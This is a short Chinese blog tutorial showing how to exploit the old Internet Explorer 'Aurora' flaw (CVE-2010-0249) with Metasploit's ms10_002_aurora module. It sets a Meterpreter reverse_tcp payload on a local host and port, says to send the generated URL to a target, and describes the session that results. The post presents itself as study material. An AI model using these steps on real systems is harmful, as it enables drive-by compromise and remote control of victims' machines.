CVE-2010-0249 简单利用

  • A+
所属分类:安全文章


CVE-2010-0249 简单利用

漏洞详情
微软官方发布了Microsoft Security Advisory (979352)安全公告,确认在IE6/7/8版本中,存在零日漏洞,涉及的操作系统包括:Windows 2000 SP4, Windows XP/2003/Vista/2008,Windows 7。微软在安全公告中表示,IE在特定情况下,有可能访问已经被释放的内存对象导致任意代码执行,该漏洞可以被用来进行网页挂马。该漏洞即后来被称为“Aurora”(极光)的零日漏洞。


CVE-2010-0249 简单利用


漏洞利用
kali打开msf,搜索MS10-002的漏洞利用模块后进入

exploit/windows/browser/ms10_002_aurora模块。

CVE-2010-0249 简单利用


设置并查看参数
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.1.70
set srvport 7070
show options

CVE-2010-0249 简单利用


参数设置没问题后输入run执行,复制URL发给目标。

CVE-2010-0249 简单利用


用IE打开URL返回kali查看结果

CVE-2010-0249 简单利用


kali已经成功和目标服务器创建一个会话,查看文件及权限。

CVE-2010-0249 简单利用


利用成功,可以返回当前用户信息

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。


CVE-2010-0249 简单利用



推荐文章++++

CVE-2010-0249 简单利用

*CVE-2018-18852 简单利用

*CVE-2020-5902 简单利用

*CVE-2018-8639 简单利用


CVE-2010-0249 简单利用

CVE-2010-0249 简单利用


本文始发于微信公众号(黑白之道):CVE-2010-0249 简单利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: